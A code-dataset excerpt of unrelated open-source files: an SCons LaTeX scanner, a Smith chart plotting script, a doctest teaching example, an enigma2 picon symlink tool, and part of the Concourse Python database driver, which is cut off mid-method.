# To prevent "dict is not hashable error"
return tuple(di.items())
class LaTeXScanCheck(object):
"""Skip all but LaTeX source files, i.e., do not scan *.eps,
*.pdf, *.jpg, etc.
"""
def __init__(self, suffixes):
self.suffixes = suffixes
def __call__(self, node, env):
current = not node.has_builder() or node.is_up_to_date()
scannable = node.get_suffix() in env.subst_list(self.suffixes)[0]
# Returning false means that the file is not scanned.
return scannable and current
kw['function'] = _scan
kw['path_function'] = FindMultiPathDirs(LaTeX.keyword_paths)
kw['recursive'] = 0
kw['skeys'] = suffixes
kw['scan_check'] = LaTeXScanCheck(suffixes)
kw['name'] = name
SCons.Scanner.Base.__init__(self, *args, **kw)
def _latex_names(self, include):
filename = include[1]
if include[0] == 'input':
base, ext = os.path.splitext( filename )
if ext == "":
return [filename + '.tex']
if (include[0] == 'include'):
return [filename + '.tex']
if include[0] == 'bibliography':
base, ext = os.path.splitext( filename )
if ext == "":
return [filename + '.bib']
if include[0] == 'usepackage':
base, ext = os.path.splitext( filename )
if ext == "":
return [filename + '.sty']
if include[0] == 'includegraphics':
base, ext = os.path.splitext( filename )
if ext == "":
#return [filename+e for e in self.graphics_extensions + TexGraphics]
# use the line above to find dependencies for the PDF builder
# when only an .eps figure is present. Since it will be found
# if the user tells scons how to make the pdf figure, leave
# it out for now.
return [filename+e for e in self.graphics_extensions]
return [filename]
def sort_key(self, include):
return SCons.Node.FS._my_normcase(str(include))
def find_include(self, include, source_dir, path):
try:
sub_path = path[include[0]]
except (IndexError, KeyError):
sub_path = ()
try_names = self._latex_names(include)
for n in try_names:
# see if we find it using the path in env[var]
i = SCons.Node.FS.find_file(n, (source_dir,) + sub_path[0])
if i:
return i, include
# see if we find it using the path in env['ENV'][var]
i = SCons.Node.FS.find_file(n, (source_dir,) + sub_path[1])
if i:
return i, include
return i, include
def scan(self, node):
# Modify the default scan function to allow for the regular
# expression to return a comma separated list of file names
# as can be the case with the bibliography keyword.
# Cache the includes list in node so we only scan it once:
# path_dict = dict(list(path))
noopt_cre = re.compile('\[.*$')
if node.includes != None:
includes = node.includes
else:
includes = self.cre.findall(node.get_text_contents())
# 1. Split comma-separated lines, e.g.
# ('bibliography', 'phys,comp')
# should become two entries
# ('bibliography', 'phys')
# ('bibliography', 'comp')
# 2. Remove the options, e.g., such as
# ('includegraphics[clip,width=0.7\\linewidth]', 'picture.eps')
# should become
# ('includegraphics', 'picture.eps')
split_includes = []
for include in includes:
inc_type = noopt_cre.sub('', include[0])
inc_list = include[1].split(',')
for j in range(len(inc_list)):
split_includes.append( (inc_type, inc_list[j]) )
#
includes = split_includes
node.includes = includes
return includes
def scan_recurse(self, node, path=()):
""" do a recursive scan of the top level target file
This lets us search for included files based on the
directory of the main file just as latex does"""
path_dict = dict(list(path))
queue = []
queue.extend( self.scan(node) )
seen = {}
# This is a hand-coded DSU (decorate-sort-undecorate, or
# Schwartzian transform) pattern. The sort key is the raw name
# of the file as specifed on the \include, \input, etc. line.
# TODO: what about the comment in the original Classic scanner:
# """which lets
# us keep the sort order constant regardless of whether the file
# is actually found in a Repository or locally."""
nodes = []
source_dir = node.get_dir()
#for include in includes:
while queue:
include = queue.pop()
try:
if seen[include[1]] == 1:
continue
except KeyError:
seen[include[1]] = 1
#
# Handle multiple filenames in include[1]
#
n, i = self.find_include(include, source_dir, path_dict)
if n is None:
# Do not bother with 'usepackage' warnings, as they most
# likely refer to system-level files
if include[0] != 'usepackage':
SCons.Warnings.warn(SCons.Warnings.DependencyWarning,
"No dependency generated for file: %s (included from: %s) -- file not found" % (i, node))
else:
sortkey = self.sort_key(n)
nodes.append((sortkey, n))
# recurse down
queue.extend( self.scan(n) )
return [pair[1] for pair in sorted(nodes)]
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| apache-2.0 |
hfegetude/EjerciciosMicroondas | tema3/ej7/parte4.py | 1 | 5836 | import numpy as np
import matplotlib.pyplot as plt
def cart2pol(x, y):
theta = np.arctan2(y, x)
rho = np.hypot(x, y)
return theta, rho
def pol2cart(theta, rho):
x = rho * np.cos(theta)
y = rho * np.sin(theta)
return x, y
def add_radius(x, y, r ):
ang, mod = cart2pol(x, y)
return pol2cart( ang, mod + r)
def adjustFigAspect(fig,aspect=1):
'''
Adjust the subplot parameters so that the figure has the correct
aspect ratio.
'''
xsize,ysize = fig.get_size_inches()
minsize = min(xsize,ysize)
xlim = .4*minsize/xsize
ylim = .4*minsize/ysize
if aspect < 1:
xlim *= aspect
else:
ylim /= aspect
fig.subplots_adjust(left=.5-xlim,
right=.5+xlim,
bottom=.5-ylim,
top=.5+ylim)
def colision(r0, r1, p1x, p1y, p2x, p2y):
d=np.linalg.norm([p1x-p2x , p1y-p2y] )
a=(r0*r0 - r1*r1 + d*d)/(2*d)
h = np.sqrt(r0*r0 - a*a)
p3x = p1x + a*(p2x - p1x)/(d)
p3y = p1y + a*(p2y - p1y)/d
p4x = p3x - h*(p2y - p1y)/d
p4y = p3y + h*(p2x - p1x)/d
return p4x, p4y
def colisionM(r0, r1, p1x, p1y, p2x, p2y):
d=np.linalg.norm([p1x-p2x , p1y-p2y] )
a=(r0*r0 - r1*r1 + d*d)/(2*d)
h = np.sqrt(r0*r0 - a*a)
p3x = p1x + a*(p2x - p1x)/(d)
p3y = p1y + a*(p2y - p1y)/d
p4x = p3x + h*(p2y - p1y)/d
p4y = p3y - h*(p2x - p1x)/d
return p4x, p4y
def line(i):
x = 1 + (1/i) * np.cos(np.arange(0 , 2*np.pi , 0.0001))
y = (1/(i))+(1/(i)) * np.sin(np.arange(0 , 2*np.pi , 0.0001))
x_t , y_t = colision(1, 1/i, 0, 0, 1, 1/i)
x_f = x[x < 1]
y_f = y[x < 1]
y_f = y_f[x_f > -1]
x_f = x_f[x_f > -1]
x_f = x_f[y_f < y_t ]
y_f = y_f[y_f < y_t ]
ax.plot(x_f, y_f , 'k', linewidth = 0.2)
x_text , y_text = add_radius(x_t, y_t, 0.01)
ax.text( x_text,
y_text,
str(i),
verticalalignment='center',
horizontalalignment='center',
rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
fontsize=3)
##ax.plot(x_text, y_text, 'ko')
def line2(i):
x = 1 + (1/(-1*i)) * np.cos(np.arange( -np.pi , np.pi, 0.0001))
y = (1/(i*-1))+(1/(i*-1)) * np.sin(np.arange(-np.pi , np.pi, 0.0001))
x_t , y_t = colisionM(1, 1/i, 0, 0, 1, -1/i)
x_f = x[x < 1]
y_f = y[x < 1]
y_f = y_f[x_f > -1]
x_f = x_f[x_f > -1]
x_f = x_f[y_f > y_t ]
y_f = y_f[y_f > y_t ]
x_text , y_text = add_radius(x_t, y_t, 0.02)
ax.text( x_text,
y_text,
str(i),
verticalalignment='center',
horizontalalignment='center',
rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
fontsize=3)
#ax.plot(x_t, y_t, 'ko')
ax.plot( x_f[20:] ,y_f[20:] , 'k', linewidth = 0.2)
def paint_line(i, ax):
x = i/(1+i) + (1/(1+i)) * np.cos(np.arange(0 , 2*np.pi , 0.001))
y = (1/(1+i)) * np.sin(np.arange(0 , 2*np.pi , 0.001))
ax.plot(x, y, 'k', linewidth = 0.2)
ax.text( 1-2*(1/(1+i)),
0.02,
str(i),
verticalalignment='bottom',
horizontalalignment='right',
rotation=90,
fontsize=3)
line(i)
line2(i)
def paint_text_degrees():
positions = np.arange(0, np.pi*2, 2*np.pi / 36)
for i, ang in enumerate(positions):
x_t , y_t = pol2cart(ang, 1.04)
ax.text( x_t,
y_t,
str(i*10),
verticalalignment='center',
horizontalalignment='center',
rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
fontsize=3)
def paint_text_wavelength():
positions = np.arange(np.pi, 3*np.pi, 2*np.pi / 50)
for i, ang in enumerate(positions):
x_t , y_t = pol2cart(ang, 1.06)
ax.text( x_t,
y_t,
str(i/100),
verticalalignment='center',
horizontalalignment='center',
rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
fontsize=3)
def imp2point(v1, v2):
reax = v1/(1+v1)
reay = 0
rear = (1/(1+v1))
imgx = 1
imgy = 1/v2
imgr = 1/v2
return colision(rear, imgr, reax, reay, imgx, imgy)
def move_wl(x, y , wl):
ax_ang, modulos = cart2pol(x, y)
ax_ang += 4*np.pi*wl
return pol2cart(ax_ang, modulos)
x_1= np.cos(np.arange(0 , 2*np.pi , 0.001))
y_1 = np.sin(np.arange(0, 2*np.pi, 0.001) )
fig = plt.figure()
adjustFigAspect(fig,aspect=1)
ax = fig.add_subplot(111)
ax.set_ylim(-1.01 , 1.01)
ax.set_xlim(-1.01, 1.01)
ax.axis('off')
ax.plot(x_1, y_1 , 'k', linewidth = 0.3)
#fig.axhline(y=0, xmin=-0.99, xmax=0.99, color='k', hold=None, linewidth = 0.5)
ax.plot([1, -1], [0, 0], 'k', linewidth = 0.3)
#ax.plot([0], [0], 'ko')
#black big lines
for i in np.arange(0.05, 0.2, 0.05):
paint_line(i , ax)
for i in np.arange(0.2, 1, 0.1):
paint_line(i , ax)
for i in np.arange(1, 2, 0.2):
paint_line(i , ax)
for i in np.arange(2, 5, 1):
paint_line(i , ax)
for i in np.array([5, 10, 20, 50]):
paint_line(i , ax)
paint_text_degrees()
paint_text_wavelength()
p1 , p2 = imp2point(1.4, 0.8)
ax.plot(p1, p2, 'ko')
start, modd= cart2pol(p1, p2)
print(start, modd)
p3, p4 = pol2cart(0,modd)
ax.plot(p3, p4, 'ko')
end, modd= cart2pol(p3, p4)
data_x = modd*np.cos(np.arange(start , end , -0.0001))
data_y = modd*np.sin(np.arange(start , end , -0.0001))
ax.plot(data_x, data_y)
p3, p4 = pol2cart(np.pi,modd)
ax.plot(p3, p4, 'ko')
end2, modd= cart2pol(p3, p4)
data_x = modd*np.cos(np.arange(0 , -np.pi , -0.0001))
data_y = modd*np.sin(np.arange(0 , -np.pi , -0.0001))
ax.plot(data_x, data_y)
fig.savefig('images/out4.pdf')
| gpl-3.0 |
CormacGG/Python-CI-Testing | doctestexample.py | 10 | 2102 | #!/usr/bin/python3
################################
# File Name: DocTestExample.py
# Author: Chadd Williams
# Date: 10/17/2014
# Class: CS 360
# Assignment: Lecture Examples
# Purpose: Demonstrate PyTest
################################
# Run these test cases via:
# chadd@bart:~> python3 -m doctest -v DocTestExample.py
# Simple int example
def testIntAddition(left: int, right: int)->"sum of left and right":
"""Test the + operator for ints
Test a simple two in example
>>> testIntAddition(1,2)
3
Use the same int twice, no problem
>>> testIntAddition(2,2)
4
Try to add a list to a set! TypeError!
Only show the first and last lines for the error message
The ... is a wild card
The ... is tabbed in TWICE
>>> testIntAddition([2], {3})
Traceback (most recent call last):
...
TypeError: can only concatenate list (not "set") to list
"""
return left + right
# Simple List example
def printFirstItemInList(theList: "list of items"):
""" Retrieve the first item from the list and print it
Test a list of ints
>>> printFirstItemInList( [ 0, 1, 2] )
0
Test a list of strings
>>> printFirstItemInList( ["CS 360", "CS 150", "CS 300" ] )
CS 360
Generate a list comphrension
>>> printFirstItemInList( [ x+1 for x in range(10) ] )
1
Work with a list of tuples
>>> printFirstItemInList( [ (x,x+1, x-1) for x in range(10) ] )
(0, 1, -1)
"""
item = theList[0]
print(item)
# Test Output of print and return value
# that \ at the end of the line allows you to continue
# the same statement on the next line!
def printAndReturnSum(*args: "variadic param")\
->"return sum of ints provided as parameters":
""" Print and return the sum of the args that are ints
>>> printAndReturnSum(1,2,3)
6
6
>>> printAndReturnSum("bob", 1)
1
1
"""
total = 0
for x in args:
# type check at run time!
if type(x) is int :
total += x
print(total)
return total
| gpl-2.0 |
sklnet/openblackhole-enigma2 | tools/create_picon_links.py | 192 | 1273 | #
# create links for picon
# usage: create_picon_links lamedb
# run in picon directory.
# It will read the servicenames from the lamedb and create symlinks
# for the servicereference names.
import os, sys
f = open(sys.argv[1]).readlines()
f = f[f.index("services\n")+1:-3]
while len(f):
ref = [int(x, 0x10) for x in f[0][:-1].split(':')]
name = f[1][:-1]
name = name.replace('\xc2\x87', '').replace('\xc2\x86', '')
# SID:NS:TSID:ONID:STYPE:UNUSED(channelnumber in enigma1)
# X X X X D D
# REFTYPE:FLAGS:STYPE:SID:TSID:ONID:NS:PARENT_SID:PARENT_TSID:UNUSED
# D D X X X X X X X X
refstr = "1:0:%X:%X:%X:%X:%X:0:0:0" % (ref[4], ref[0], ref[2], ref[3], ref[1])
refstr = refstr.replace(':', '_')
filename = name + ".png"
linkname = refstr + ".png"
filename = filename.replace('/', '_').replace('\\', '_').replace('&', '_').replace('\'', '').replace('"', '').replace('`', '')
filename = filename.replace('\n', '')
for i in range(len(filename)):
if ord(filename[i]) > 127:
filename = filename[0:i] + '_' + filename[i + 1:]
if os.access(filename, os.F_OK) and not os.access(linkname, os.F_OK):
os.symlink(filename, linkname)
else:
print "could not find %s (%s)" % (filename, name)
f =f[3:]
| gpl-2.0 |
prateek135/concourse | concourse-driver-python/concourse/concourse.py | 7 | 49719 | __author__ = "Jeff Nelson"
__copyright__ = "Copyright 2015, Cinchapi Inc."
__license__ = "Apache, Version 2.0"
from thrift import Thrift
from thrift.transport import TSocket
from thriftapi import ConcourseService
from thriftapi.shared.ttypes import *
from utils import *
from collections import OrderedDict
import ujson
from configparser import ConfigParser
import itertools
import os
class Concourse(object):
""" Concourse is a self-tuning database that makes it easier to quickly build reliable and scalable systems.
Concourse dynamically adapts to any application and offers features like automatic indexing, version control, and
distributed ACID transactions within a big data platform that manages itself, reduces costs and allows developers
to focus on what really matters.
Data Model:
The Concourse data model is lightweight and flexible. Unlike other databases, Concourse is completely schemaless and
does not hold data in tables or collections. Concourse is simply a distributed document-graph. All data is
stored in records (similar to documents or rows in other databases). Each record has multiple keys. And each
key has one or more distinct values. Like any graph, you can link records to one another. And the structure of one
record does not affect the structure of another.
- Record: A logical grouping of data about a single person, place or thing (i.e. an object). Each record is
identified by a unique primary key.
- Key: A attribute that maps to one or more distinct values.
- Value: A dynamically typed quantity.
Data Types:
Concourse natively stores the following primitives: bool, double, integer, string (UTF-8) and Tag (a string that is
not full text searchable). Any other data type will be stored as its __str__ representation.
Links:
Concourse allows linking a key in one record to another record using the link() function. Links are retrievable and
queryable just like any other value.
Transactions:
By default, Concourse conducts every operation in autocommit mode where every change is immediately written.
You can also stage a group of operations in an ACID transaction. Transactions are managed using the stage(),
commit() and abort() commands.
Version Control:
Concourse automatically tracks every changes to data and the API exposes several methods to tap into this feature.
1) You can get() and select() previous version of data by specifying a timestamp using natural language or a unix
timestamp integer in microseconds.
2) You can browse() and find() records that matched a criteria in the past by specifying a timestamp using natural
language or a unix timestamp integer in microseconds.
3) You can audit() and diff() changes over time, revert() to previous states and chronologize() how data has
evolved within a range of time.
"""
@staticmethod
def connect(host="localhost", port=1717, username="admin", password="admin", environment="", **kwargs):
""" This is an alias for the constructor.
"""
return Concourse(host, port, username, password, environment, **kwargs)
def __init__(self, host="localhost", port=1717, username="admin", password="admin", environment="", **kwargs):
""" Initialize a new client connection
:param host: the server host (default: localhost)
:param port: the listener post (default: 1717)
:param username: the username with which to connect (default: admin)
:param password: the password for the username (default: admin)
:param environment: the environment to use, (default: the 'default_environment' in the server's
concourse.prefs file)
You may specify the path to a preferences file using the 'prefs' keyword argument. If a prefs file
is supplied, the values contained therewithin for any of arguments above become the default
if the arguments are not explicitly given values.
:return: the handle
"""
username = username or find_in_kwargs_by_alias('username', kwargs)
password = password or find_in_kwargs_by_alias('password', kwargs)
prefs = find_in_kwargs_by_alias('prefs', kwargs)
if prefs:
# Hack to use ConfigParser with java style properties file
with open(os.path.abspath(os.path.expanduser(prefs))) as stream:
lines = itertools.chain(("[default]",), stream)
prefs = ConfigParser()
prefs.read_file(lines)
prefs = dict(prefs._sections['default'])
else:
prefs = {}
self.host = prefs.get('host', host)
self.port = int(prefs.get('port', port))
self.username = prefs.get('username', username)
self.password = prefs.get('password', password)
self.environment = prefs.get('environment', environment)
try:
transport = TSocket.TSocket(self.host, self.port)
transport = TTransport.TBufferedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
self.client = ConcourseService.Client(protocol)
transport.open()
self.transport = transport
self.__authenticate()
self.transaction = None
except Thrift.TException:
raise RuntimeError("Could not connect to the Concourse Server at "+self.host+":"+str(self.port))
def __authenticate(self):
""" Internal method to login with the username/password and locally store the AccessToken for use with
subsequent operations.
"""
try:
self.creds = self.client.login(self.username, self.password, self.environment)
except Thrift.TException as e:
raise e
def abort(self):
""" Abort the current transaction and discard any changes that were staged. After returning, the
driver will return to autocommit mode and all subsequent changes will be committed immediately.
"""
if self.transaction:
token = self.transaction
self.transaction = None
self.client.abort(self.creds, token, self.environment)
def add(self, key, value, records=None, **kwargs):
""" Add a a value to a key within a record if it does not exist.
:param key: string
:param value: object
:param record: int (optional) or records: list (optional)
:return: 1) a boolean that indicates whether the value was added, if a record is supplied 2) a dict mapping
record to a boolean that indicates whether the value was added, if a list of records is supplied 3) the id of
the new record where the data was added, if not record is supplied as an argument
"""
value = python_to_thrift(value)
records = records or kwargs.get('record')
if records is None:
return self.client.addKeyValue(key, value, self.creds,
self.transaction, self.environment)
elif isinstance(records, list):
return self.client.addKeyValueRecords(key, value, records,
self.creds, self.transaction, self.environment)
elif isinstance(records, (int, long)):
return self.client.addKeyValueRecord(key, value, records,
self.creds, self.transaction, self.environment)
else:
require_kwarg('key and value')
def audit(self, key=None, record=None, start=None, end=None, **kwargs):
""" Return a log of revisions.
:param key:string (optional)
:param record:int
:param start:string|int (optional)
:param end:string|int (optional)
:return: a dict mapping a timestamp to a description of changes
"""
start = start or find_in_kwargs_by_alias('timestamp', kwargs)
startstr = isinstance(start, basestring)
endstr = isinstance(end, basestring)
if isinstance(key, int):
record = key
key = None
if key and record and start and not startstr and end and not endstr:
data = self.client.auditKeyRecordStartEnd(key, record, start, end, self.creds, self.transaction,
self.environment)
elif key and record and start and startstr and end and endstr:
data = self.client.auditKeyRecordStartstrEndstr(key, record, start, end, self.creds, self.transaction,
self.environment)
elif key and record and start and not startstr:
data = self.client.auditKeyRecordStart(key, record, start, self.creds, self.transaction, self.environment)
elif key and record and start and startstr:
data = self.client.auditKeyRecordStartstr(key, record, start, self.creds, self.transaction, self.environment)
elif key and record:
data = self.client.auditKeyRecord(key, record, self.creds, self.transaction, self.environment)
elif record and start and not startstr and end and not endstr:
data = self.client.auditRecordStartEnd(record, start, end, self.creds, self.transaction,
self.environment)
elif record and start and startstr and end and endstr:
data = self.client.auditRecordStartstrEndstr(record, start, end, self.creds, self.transaction,
self.environment)
elif record and start and not startstr:
data = self.client.auditRecordStart(record, start, self.creds, self.transaction, self.environment)
elif record and start and startstr:
data = self.client.auditRecordStartstr(record, start, self.creds, self.transaction, self.environment)
elif record:
data = self.client.auditRecord(record, self.creds, self.transaction, self.environment)
else:
require_kwarg('record')
data = OrderedDict(sorted(data.items()))
return data
def browse(self, keys=None, timestamp=None, **kwargs):
""" Return a view of all the values indexed for a key or group of keys.
:param key: string or keys: list
:param timestamp:string (optional)
:return: 1) a dict mapping a value to a set of records containing the value if a single key is specified or
2) a dict mapping a key to a dict mapping a value to set of records containing that value of a list of keys
is specified
"""
keys = keys or kwargs.get('key')
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
timestamp_is_string = isinstance(timestamp, basestring)
if isinstance(keys, list) and timestamp and not timestamp_is_string:
data = self.client.browseKeysTime(keys, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and timestamp and timestamp_is_string:
data = self.client.browseKeysTimestr(keys, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(keys, list):
data = self.client.browseKeys(keys, self.creds, self.transaction, self.environment)
elif timestamp and not timestamp_is_string:
data = self.client.browseKeyTime(keys, timestamp, self.creds, self.transaction, self.environment)
elif timestamp and timestamp_is_string:
data = self.client.browseKeyTimestr(keys, timestamp, self.creds, self.transaction, self.environment)
elif keys:
data = self.client.browseKey(keys, self.creds, self.transaction, self.environment)
else:
require_kwarg('key or keys')
return pythonify(data)
def chronologize(self, key, record, start=None, end=None, **kwargs):
""" Return a chronological view that shows the state of a field (key/record) over a range of time.
:param key: string
:param record: int
:param start: string|int (optional)
:param end: string|int (optional)
:return: the chronological view of the field over the specified (or entire) range of time
"""
start = start or find_in_kwargs_by_alias('timestamp', kwargs)
startstr = isinstance(start, basestring)
endstr = isinstance(end, basestring)
if start and not startstr and end and not endstr:
data = self.client.chronologizeKeyRecordStartEnd(key, record, start, end, self.creds, self.transaction,
self.environment)
elif start and startstr and end and endstr:
data = self.client.chronologizeKeyRecordStartstrEndstr(key, record, start, end, self.creds, self.transaction,
self.environment)
elif start and not startstr:
data = self.client.chronologizeKeyRecordStart(key, record, start, self.creds, self.transaction,
self.environment)
elif start and startstr:
data = self.client.chronologizeKeyRecordStartstr(key, record, start, self.creds, self.transaction,
self.environment)
else:
data = self.client.chronologizeKeyRecord(key, record, self.creds, self.transaction, self.environment)
data = OrderedDict(sorted(data.items()))
return pythonify(data)
def clear(self, keys=None, records=None, **kwargs):
""" Atomically remove all the data from a field or an entire record.
:param key: string or keys: list
:param record: int or records list
"""
keys = keys or kwargs.get('key')
records = records or kwargs.get('record')
if isinstance(keys, list) and isinstance(records, list):
return self.client.clearKeysRecords(keys, records, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and not keys:
return self.client.clearRecords(records, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and records:
return self.client.clearKeysRecord(keys, records, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and keys:
return self.client.clearKeyRecords(keys, records, self.creds, self.transaction, self.environment)
elif keys and records:
return self.client.clearKeyRecord(keys, records, self.creds, self.transaction, self.environment)
elif records:
return self.client.clearRecord(records, self.creds, self.transaction, self.environment)
else:
require_kwarg('record or records')
def commit(self):
""" Commit the currently running transaction.
:return: True if the transaction commits. Otherwise, False.
"""
token = self.transaction
self.transaction = None
if token:
return self.client.commit(self.creds, token, self.environment)
else:
return False
def describe(self, records=None, timestamp=None, **kwargs):
""" Return all keys in a record at the present or the specified timestamp.
:param record (int) or records (list)
:param timestamp: string|int (optional)
:return: a set of keys if a single record if provided, if multiple records are provided, a mapping from the
record to a set of keys
"""
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
timestr = isinstance(timestamp, basestring)
records = records or kwargs.get('record')
if isinstance(records, list) and timestamp and not timestr:
return self.client.describeRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and timestamp and timestr:
return self.client.describeRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list):
return self.client.describeRecords(records, self.creds, self.transaction, self.environment)
elif timestamp and not timestr:
return self.client.describeRecordTime(records, timestamp, self.creds, self.transaction, self.environment)
elif timestamp and timestr:
return self.client.describeRecordTimestr(records, timestamp, self.creds, self.transaction, self.environment)
else:
return self.client.describeRecord(records, self.creds, self.transaction, self.environment)
def diff(self, key=None, record=None, start=None, end=None, **kwargs):
""" Return the differences in a field, record of index from a start timestamp to an end timestamp.
:param key:
:param record:
:param start:
:param end:
:return:
"""
start = start or find_in_kwargs_by_alias('timestamp', kwargs)
startstr = isinstance(start, basestring)
endstr = isinstance(end, basestring)
if key and record and start and not startstr and end and not endstr:
data = self.client.diffKeyRecordStartEnd(key, record, start, end, self.creds, self.transaction,
self.environment)
elif key and record and start and startstr and end and endstr:
data = self.client.diffKeyRecordStartstrEndstr(key, record, start, end, self.creds, self.transaction,
self.environment)
elif key and record and start and not startstr:
data = self.client.diffKeyRecordStart(key, record, start, self.creds, self.transaction, self.environment)
elif key and record and start and startstr:
data = self.client.diffKeyRecordStartstr(key, record, start, self.creds, self.transaction, self.environment)
elif key and start and not startstr and end and not endstr:
data = self.client.diffKeyStartEnd(key, start, end, self.creds, self.transaction, self.environment)
elif key and start and startstr and end and endstr:
data = self.client.diffKeyStartstrEndstr(key, start, end, self.creds, self.transaction, self.environment)
elif key and start and not startstr:
data = self.client.diffKeyStart(key, start, self.creds, self.transaction, self.environment)
elif key and start and startstr:
data = self.client.diffKeyStartstr(key, start, self.creds, self.transaction, self.environment)
elif record and start and not startstr and end and not endstr:
data = self.client.diffRecordStartEnd(record, start, end, self.creds, self.transaction, self.environment)
elif record and start and startstr and end and endstr:
data = self.client.diffRecordStartstrEndstr(record, start, end, self.creds, self.transaction,
self.environment)
elif record and start and not startstr:
data = self.client.diffRecordStart(record, start, self.creds, self.transaction, self.environment)
elif record and start and startstr:
data = self.client.diffRecordStartstr(record, start, self.creds, self.transaction, self.environment)
else:
require_kwarg('start and (record or key)')
return pythonify(data)
def close(self):
""" Close the connection.
"""
self.exit()
def exit(self):
""" Close the connection.
"""
self.client.logout(self.creds, self.environment)
self.transport.close()
def find(self, criteria=None, **kwargs):
"""
:param criteria:
:return:
"""
criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
key = kwargs.get('key')
operator = kwargs.get('operator')
operatorstr = isinstance(operator, basestring)
values = kwargs.get('value') or kwargs.get('values')
values = [values] if not isinstance(values, list) else values
values = thriftify(values)
timestamp = find_in_kwargs_by_alias('timestamp', kwargs)
timestr = isinstance(timestamp, basestring)
if criteria:
data = self.client.findCcl(criteria, self.creds, self.transaction, self.environment)
elif key and operator and not operatorstr and values and not timestamp:
data = self.client.findKeyOperatorValues(key, operator, values, self.creds, self.transaction,
self.environment)
elif key and operator and operatorstr and values and not timestamp:
data = self.client.findKeyOperatorstrValues(key, operator, values, self.creds, self.transaction,
self.environment)
elif key and operator and not operatorstr and values and timestamp and not timestr:
data = self.client.findKeyOperatorValuesTime(key, operator, values, timestamp, self.creds, self.transaction,
self.environment)
elif key and operator and operatorstr and values and timestamp and not timestr:
data = self.client.findKeyOperatorstrValuesTime(key, operator, values, timestamp, self.creds,
self.transaction, self.environment)
elif key and operator and not operatorstr and values and timestamp and timestr:
data = self.client.findKeyOperatorValuesTimestr(key, operator, values, timestamp, self.creds,
self.transaction, self.environment)
elif key and operator and operatorstr and values and timestamp and timestr:
data = self.client.findKeyOperatorstrValuesTimestr(key, operator, values, timestamp, self.creds,
self.transaction, self.environment)
else:
require_kwarg('criteria or all of (key, operator and value/s)')
data = list(data) if isinstance(data, set) else data
return data
def find_or_add(self, key, value):
"""
:param key:
:param value:
:return:
"""
value = python_to_thrift(value)
return self.client.findOrAddKeyValue(key, value, self.creds, self.transaction, self.environment)
def find_or_insert(self, criteria=None, data=None, **kwargs):
"""
:param criteria:
:param data:
:param kwargs:
:return:
"""
data = data or kwargs.get('json')
if isinstance(data, dict) or isinstance(data, list):
data = ujson.dumps(data)
criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
return self.client.findOrInsertCclJson(criteria, data, self.creds, self.transaction, self.environment)
def get(self, keys=None, criteria=None, records=None, timestamp=None, **kwargs):
"""
:param keys:
:param criteria:
:param records:
:param timestamp:
:return:
"""
criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
keys = keys or kwargs.get('key')
records = records or kwargs.get('record')
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
timestr = isinstance(timestamp, basestring)
# Handle case when kwargs are not used and the second parameter is a the record
# (e.g. trying to get key/record(s))
if (isinstance(criteria, int) or isinstance(criteria, list)) and not records:
records = criteria
criteria = None
if isinstance(records, list) and not keys and not timestamp:
data = self.client.getRecords(records, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and timestamp and not timestr and not keys:
data = self.client.getRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and timestamp and timestr and not keys:
data = self.client.getRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and isinstance(keys, list) and not timestamp:
data = self.client.getKeysRecords(keys, records, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and isinstance(keys, list) and timestamp and not timestr:
data = self.client.getKeysRecordsTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(records, list) and isinstance(keys, list) and timestamp and timestr:
data = self.client.getKeysRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and criteria and not timestamp:
data = self.client.getKeysCcl(keys, criteria, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and criteria and timestamp and not timestr:
data = self.client.getKeysCclTime(keys, criteria, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and criteria and timestamp and timestr:
data = self.client.getKeysCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and records and not timestamp:
data = self.client.getKeysRecord(keys, records, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and records and timestamp and not timestr:
data = self.client.getKeysRecordTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and records and timestamp and timestr:
data = self.client.getKeysRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif criteria and not keys and not timestamp:
data = self.client.getCcl(criteria, self.creds, self.transaction, self.environment)
elif criteria and timestamp and not timestr and not keys:
data = self.client.getCclTime(criteria, timestamp, self.creds, self.transaction, self.environment)
elif criteria and timestamp and timestr and not keys:
data = self.client.getCclTimestr(criteria, timestamp, self.creds, self.transaction, self.environment)
elif records and not keys and not timestamp:
data = self.client.getRecord(records, self.creds, self.transaction, self.environment)
elif records and timestamp and not timestr and not keys:
data = self.client.getRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
elif records and timestamp and timestr and not keys:
data = self.client.getRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif keys and criteria and not timestamp:
data = self.client.getKeyCcl(keys, criteria, self.creds, self.transaction, self.environment)
elif keys and criteria and timestamp and not timestr:
